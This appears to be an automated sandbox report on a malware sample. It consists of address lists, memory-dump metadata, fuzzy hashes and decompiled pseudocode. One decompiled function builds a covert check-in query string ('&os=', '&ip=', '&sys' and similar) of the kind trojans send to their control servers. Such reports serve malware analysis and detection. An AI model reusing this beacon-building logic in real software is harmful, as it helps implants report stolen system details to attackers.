                                                                                                                                                                                                                                                                                    0x00fc831e
                                                                                                                                                                                                                                                                                    0x00fc837a
                                                                                                                                                                                                                                                                                    0x00fc837c
                                                                                                                                                                                                                                                                                    0x00fc8384
                                                                                                                                                                                                                                                                                    0x00fc8386
                                                                                                                                                                                                                                                                                    0x00fc8388
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc838a
                                                                                                                                                                                                                                                                                    0x00fc8390
                                                                                                                                                                                                                                                                                    0x00fc8392
                                                                                                                                                                                                                                                                                    0x00fc8394
                                                                                                                                                                                                                                                                                    0x00fc83a9
                                                                                                                                                                                                                                                                                    0x00fc83a9
                                                                                                                                                                                                                                                                                    0x00fc83ab
                                                                                                                                                                                                                                                                                    0x00fc83da
                                                                                                                                                                                                                                                                                    0x00fc83e1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc83e1
                                                                                                                                                                                                                                                                                    0x00fc83af
                                                                                                                                                                                                                                                                                    0x00fc83b0
                                                                                                                                                                                                                                                                                    0x00fc83b2
                                                                                                                                                                                                                                                                                    0x00fc83b4
                                                                                                                                                                                                                                                                                    0x00fc83b4
                                                                                                                                                                                                                                                                                    0x00fc83b6
                                                                                                                                                                                                                                                                                    0x00fc83b8
                                                                                                                                                                                                                                                                                    0x00fc83ba
                                                                                                                                                                                                                                                                                    0x00fc83ce
                                                                                                                                                                                                                                                                                    0x00fc83ce
                                                                                                                                                                                                                                                                                    0x00fc83d1
                                                                                                                                                                                                                                                                                    0x00fc83d3
                                                                                                                                                                                                                                                                                    0x00fc83d3
                                                                                                                                                                                                                                                                                    0x00fc83d4
                                                                                                                                                                                                                                                                                    0x00fc83d4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc83bc
                                                                                                                                                                                                                                                                                    0x00fc83bc
                                                                                                                                                                                                                                                                                    0x00fc83bc
                                                                                                                                                                                                                                                                                    0x00fc83c5
                                                                                                                                                                                                                                                                                    0x00fc83c6
                                                                                                                                                                                                                                                                                    0x00fc83c8
                                                                                                                                                                                                                                                                                    0x00fc83ca
                                                                                                                                                                                                                                                                                    0x00fc83ca
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc83bc
                                                                                                                                                                                                                                                                                    0x00fc83ba
                                                                                                                                                                                                                                                                                    0x00fc8396
                                                                                                                                                                                                                                                                                    0x00fc839d
                                                                                                                                                                                                                                                                                    0x00fc839d
                                                                                                                                                                                                                                                                                    0x00fc839f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc83a1
                                                                                                                                                                                                                                                                                    0x00fc83a2
                                                                                                                                                                                                                                                                                    0x00fc83a5
                                                                                                                                                                                                                                                                                    0x00fc83a7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc83a7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc839d
                                                                                                                                                                                                                                                                                    0x00fc8320
                                                                                                                                                                                                                                                                                    0x00fc8323
                                                                                                                                                                                                                                                                                    0x00fc8328
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc8331
                                                                                                                                                                                                                                                                                    0x00fc820e
                                                                                                                                                                                                                                                                                    0x00fc8210
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000

APIs
• NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00FC827E
Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
Similarity
• API ID: MemoryQueryVirtual
• String ID:
• API String ID: 2850889275-0
• Opcode ID: 5bd3c2b7ade9a5566b381ccbf829f7a5f6a44bf8f1945ba5246d606b9a593617
• Instruction ID: e93cb58327fcd9d4ee1b0b22214ad27f7fb98158371d1fc7edab2e16d25716cf
• Opcode Fuzzy Hash: 5bd3c2b7ade9a5566b381ccbf829f7a5f6a44bf8f1945ba5246d606b9a593617
• Instruction Fuzzy Hash: C561C931A00A979FDB25CB28CB9AF6933A1EB957A4B24813DD816C7190EF31DC43A644
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                                                                                    			E6E052264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                                                                                                                    				_push(_t84);
                                                                                                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                                                                                                    				asm("cld");
                                                                                                                                                                                                                                                                                    				_t66 = _a8;
                                                                                                                                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                                                                                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                                                    					_push(_t89);
                                                                                                                                                                                                                                                                                    					E6E0523CB(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                                                    					_t46 = 1;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v12 = _t44;
                                                                                                                                                                                                                                                                                    					_v8 = _a12;
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                                                    					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                                                    					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    					_t49 = E6E052485(_t66);
                                                                                                                                                                                                                                                                                    					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                                                                                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                                    								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t54 =  *_t53();
                                                                                                                                                                                                                                                                                    								_t89 = _t89;
                                                                                                                                                                                                                                                                                    								_t86 = _t86;
                                                                                                                                                                                                                                                                                    								_t66 = _a8;
                                                                                                                                                                                                                                                                                    								_t55 = _t54;
                                                                                                                                                                                                                                                                                    								_t106 = _t54;
                                                                                                                                                                                                                                                                                    								if(_t106 == 0) {
                                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									if(_t106 < 0) {
                                                                                                                                                                                                                                                                                    										_t46 = 0;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    										E6E052370(_t55, _t66);
                                                                                                                                                                                                                                                                                    										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                                                    										E6E0523CB(_t89, _t66, 0);
                                                                                                                                                                                                                                                                                    										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                                                    										E6E052467(_t82[2]);
                                                                                                                                                                                                                                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                                                    										_t66 = 0;
                                                                                                                                                                                                                                                                                    										_t86 = 0;
                                                                                                                                                                                                                                                                                    										 *(_t82[2])(1);
                                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                                                    						_t46 = 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                                                                    			}
























Memory Dump Source
• Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
• Instruction ID: 8a1957b3c98d4e1a37ec10318b85517cda047920874bba1a166f723e1c171560
• Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
• Instruction Fuzzy Hash: 2621B676900205DFCB00DFA8C980AABBBB9FF49350F4585A8D9159B345D730FA25CBE0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                                                                                    			E00FC7FA8(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                                                                                                                    				_push(_t84);
                                                                                                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                                                                                                    				asm("cld");
                                                                                                                                                                                                                                                                                    				_t66 = _a8;
                                                                                                                                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                                                                                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                                                    					_push(_t89);
                                                                                                                                                                                                                                                                                    					E00FC8113(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                                                    					_t46 = 1;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v12 = _t44;
                                                                                                                                                                                                                                                                                    					_v8 = _a12;
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                                                    					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                                                    					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    					_t49 = E00FC81CD(_t66);
                                                                                                                                                                                                                                                                                    					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                                                                                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                                    								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t54 =  *_t53();
                                                                                                                                                                                                                                                                                    								_t89 = _t89;
                                                                                                                                                                                                                                                                                    								_t86 = _t86;
                                                                                                                                                                                                                                                                                    								_t66 = _a8;
                                                                                                                                                                                                                                                                                    								_t55 = _t54;
                                                                                                                                                                                                                                                                                    								_t106 = _t54;
                                                                                                                                                                                                                                                                                    								if(_t106 == 0) {
                                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									if(_t106 < 0) {
                                                                                                                                                                                                                                                                                    										_t46 = 0;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    										E00FC80B8(_t55, _t66);
                                                                                                                                                                                                                                                                                    										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                                                    										E00FC8113(_t89, _t66, 0);
                                                                                                                                                                                                                                                                                    										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                                                    										E00FC81AF(_t82[2]);
                                                                                                                                                                                                                                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                                                    										_t66 = 0;
                                                                                                                                                                                                                                                                                    										_t86 = 0;
                                                                                                                                                                                                                                                                                    										 *(_t82[2])(1);
                                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                                                    						_t46 = 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x00fc7ffc
                                                                                                                                                                                                                                                                                    0x00fc7ffe
                                                                                                                                                                                                                                                                                    0x00fc8059
                                                                                                                                                                                                                                                                                    0x00fc8059
                                                                                                                                                                                                                                                                                    0x00fc805f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc8000
                                                                                                                                                                                                                                                                                    0x00fc800f
                                                                                                                                                                                                                                                                                    0x00fc8011
                                                                                                                                                                                                                                                                                    0x00fc8012
                                                                                                                                                                                                                                                                                    0x00fc8013
                                                                                                                                                                                                                                                                                    0x00fc8016
                                                                                                                                                                                                                                                                                    0x00fc8016
                                                                                                                                                                                                                                                                                    0x00fc8018
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc801a
                                                                                                                                                                                                                                                                                    0x00fc801a
                                                                                                                                                                                                                                                                                    0x00fc8064
                                                                                                                                                                                                                                                                                    0x00fc801c
                                                                                                                                                                                                                                                                                    0x00fc801c
                                                                                                                                                                                                                                                                                    0x00fc8020
                                                                                                                                                                                                                                                                                    0x00fc8028
                                                                                                                                                                                                                                                                                    0x00fc802d
                                                                                                                                                                                                                                                                                    0x00fc8032
                                                                                                                                                                                                                                                                                    0x00fc803e
                                                                                                                                                                                                                                                                                    0x00fc8046
                                                                                                                                                                                                                                                                                    0x00fc804d
                                                                                                                                                                                                                                                                                    0x00fc8053
                                                                                                                                                                                                                                                                                    0x00fc8057
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc8057
                                                                                                                                                                                                                                                                                    0x00fc801a
                                                                                                                                                                                                                                                                                    0x00fc8018
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc7ffe
                                                                                                                                                                                                                                                                                    0x00fc8072
                                                                                                                                                                                                                                                                                    0x00fc8072
                                                                                                                                                                                                                                                                                    0x00fc8072
                                                                                                                                                                                                                                                                                    0x00fc7fee
                                                                                                                                                                                                                                                                                    0x00fc808e
                                                                                                                                                                                                                                                                                    0x00fc8095

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                                                                    • Instruction ID: c05beb010244e71865e2905d419aa017dd5c0e6fa9e82817ba30775de42974b2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF21A7729002059FCB10EF68CD82E67B7A5BF443A0F09855DDD158B245DB30F91AD7E0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182830756.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                                                                                                                    • Instruction ID: cd0bda911afd517f1e9e3aeba0c3b18d9ed253ce7f38a8fd3335d8759b6d5ebc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D0145333142428FD788CF6DD994E7EBBE8EBC6360B65807EE402C3615D238E446E520
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182830756.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 1813b20754f63850370f296089f33479170be5c3db20c3fcd4cbcb0174fb5e75
                                                                                                                                                                                                                                                                                    • Instruction ID: c179b1b33c1c414372bb5a7efb4172863f7963045f50e074cfbcd01fb30aef0c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1813b20754f63850370f296089f33479170be5c3db20c3fcd4cbcb0174fb5e75
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18F03771240200AFC754CF99C8D0EA277EDEB88364B298058A908CB312C378EC02DBA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                    			E00FC6124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                                                                                    				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xfca290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xfca018; // 0x785c6176
					asm("bswap eax");
					_t32 =  *0xfca014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xfca010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xfca00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0xfca2d0; // 0x292d5a8
					_t2 = _t35 + 0xfcb622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0xfca02c,  *0xfca004, _t110);
					_t38 = E00FC271A();
					_t39 =  *0xfca2d0; // 0x292d5a8
					_t3 = _t39 + 0xfcb662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xfca2d0; // 0x292d5a8
						_t7 = _t92 + 0xfcb66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00FC2956(_t99);
					_t44 =  *0xfca2d0; // 0x292d5a8
					_t9 = _t44 + 0xfcb38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xfca2d0; // 0x292d5a8
					_t11 = _t48 + 0xfcb33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xfca328; // 0x38f95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xfca2d0; // 0x292d5a8
						_t13 = _t88 + 0xfcb685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xfca37c; // 0x38f9630
					_a28 = E00FC5741(0xfca00a, _t105 + 4);
					_t55 =  *0xfca318; // 0x38f95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xfca2d0; // 0x292d5a8
						_t16 = _t84 + 0xfcb8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xfca314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xfca2d0; // 0x292d5a8
						_t18 = _t81 + 0xfcb8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xfca290, _t107, 0x800);
						if(_t98 != _t107) {
							E00FC1A51(GetTickCount());
							_t62 =  *0xfca37c; // 0x38f9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xfca37c; // 0x38f9630
							__imp__(_t66 + 0x40);
							_t68 =  *0xfca37c; // 0x38f9630
							_t115 = E00FC5AE3(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                                    							if(_t115 != _t107) {
                                                                                                                                                                                                                                                                                    								StrTrimA(_t115, 0xfc92cc);
                                                                                                                                                                                                                                                                                    								_push(_t115);
                                                                                                                                                                                                                                                                                    								_t108 = E00FC2829();
                                                                                                                                                                                                                                                                                    								_v4 = _t108;
                                                                                                                                                                                                                                                                                    								if(_t108 != 0) {
                                                                                                                                                                                                                                                                                    									 *_t115 = 0;
                                                                                                                                                                                                                                                                                    									__imp__(_t98, _a8);
                                                                                                                                                                                                                                                                                    									_t109 = __imp__;
                                                                                                                                                                                                                                                                                    									 *_t109(_t98, _t108);
                                                                                                                                                                                                                                                                                    									 *_t109(_t98, _t115);
                                                                                                                                                                                                                                                                                    									_t78 = E00FC3B46(0xffffffffffffffff, _t98, _v12, _v8);
                                                                                                                                                                                                                                                                                    									_v40 = _t78;
                                                                                                                                                                                                                                                                                    									if(_t78 != 0 && _t78 != 0x10d2) {
                                                                                                                                                                                                                                                                                    										E00FC2813();
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									HeapFree( *0xfca290, 0, _v24);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								HeapFree( *0xfca290, 0, _t115);
                                                                                                                                                                                                                                                                                    								_t107 = 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							HeapFree( *0xfca290, _t107, _t98);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						HeapFree( *0xfca290, _t107, _a20);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					HeapFree( *0xfca290, _t107, _t117);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    0x00fc632c
                                                                                                                                                                                                                                                                                    0x00fc6330
                                                                                                                                                                                                                                                                                    0x00fc6336
                                                                                                                                                                                                                                                                                    0x00fc633a
                                                                                                                                                                                                                                                                                    0x00fc6341
                                                                                                                                                                                                                                                                                    0x00fc6348
